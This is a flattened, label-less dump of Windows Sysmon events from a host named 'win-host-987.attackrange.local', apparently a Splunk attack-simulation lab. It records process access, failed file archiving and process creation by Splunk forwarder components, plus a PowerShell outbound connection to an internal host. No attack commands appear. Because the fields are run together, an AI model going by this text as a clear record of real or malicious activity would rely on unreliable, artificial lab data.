Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03A862BC5AA4308B0599CD14BEA41AD9,SHA256=2CD2FB7863DE45642FA1942D639DB3D70C121A27A975A68208451DDA05DE829B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:20.936{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1F5C063112C5F3AB0C3A51396A6A4B1,SHA256=9E2E259905AD7740033B4D2E18C0CA8CB7788819DBCC6ED7819AC519FC4944CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:21.984{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8755C326CD636A3DA0A0D3C8FE4B59F6,SHA256=272411C743ECABBC89A160F022E9144E591325524026BAE3EFDF1634C9728CBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:23.234{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=78B5C2B77C3A9AB8DF789188F1652611,SHA256=85554F55ADA102DA18A2A90CE86B48A862E1217F60C39464BEDF4B1593E0AC80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:23.003{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0604E788527F531D7F13E4475CBCA38,SHA256=7A6F71E57D075AE920B6CF6FA9888773C5876D4A3649F3F034B77D9C45BE94A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:24.886{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0E4-6140-8256-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.886{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:24.886{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.886{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:24.886{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.886{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A0E4-6140-8256-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.886{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0E4-6140-8256-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.880{B81B27B7-A0E4-6140-8256-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.449{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E9CBCF445C0277147CF6D670F2DDFB4A,SHA256=A698A1AAF1F3462CD30BA905D55617AA8CC99B1C6D4EC5CBCF64B68B2FF7682B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
10341000x800000000000000036497466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.418{B81B27B7-A0E4-6140-8156-04000000C801}71122324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.218{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0E4-6140-8156-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:24.218{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.218{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:24.218{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.218{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:24.218{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A0E4-6140-8156-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.218{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0E4-6140-8156-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.203{B81B27B7-A0E4-6140-8156-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.018{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653639254A4A0D9E98B55F7BACB2EA91,SHA256=D56760CC65B868B9E77143A571E1C3082360082032C1B0898DA5372E1E57C6B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:55.118{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50533-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:25.217{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68A8C9915C15827B467948CBBA5C962E,SHA256=B554638F2BF3B478B07ECA4DEC0B1C83A1B2E17DE0815F0A10CF7E2149697545,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036497477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:25.217{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03A862BC5AA4308B0599CD14BEA41AD9,SHA256=2CD2FB7863DE45642FA1942D639DB3D70C121A27A975A68208451DDA05DE829B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:25.048{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F1A3318F87E930F97EB2B917D86090D,SHA256=B6CDC3D72AB9D911CB88A9505826E96527F054F4C989CD382CCE3E208D127B5C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:55.917{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50534-false10.0.1.12-8000- 23542300x800000000000000036497480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 